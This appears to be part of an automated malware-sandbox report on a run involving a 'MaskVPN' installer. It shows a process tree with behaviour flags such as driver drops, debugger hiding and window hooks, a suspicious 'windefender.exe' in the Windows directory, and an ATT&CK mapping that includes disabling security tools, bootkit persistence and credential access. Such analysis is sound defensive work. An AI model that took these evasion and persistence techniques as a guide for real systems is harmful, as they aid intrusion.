- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6284

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:2016

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5a4fdbb4-b4b9-5e42-8042-d50b6443ff13}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3388

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5428

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5532

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:1628

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:5856

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5552

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:4272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4940

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6604

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3640

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5172

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:4624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4616

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:788

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xf8
1⤵
PID:4920

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1228

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7732

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4540

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7916

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8612

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7060

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6052

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery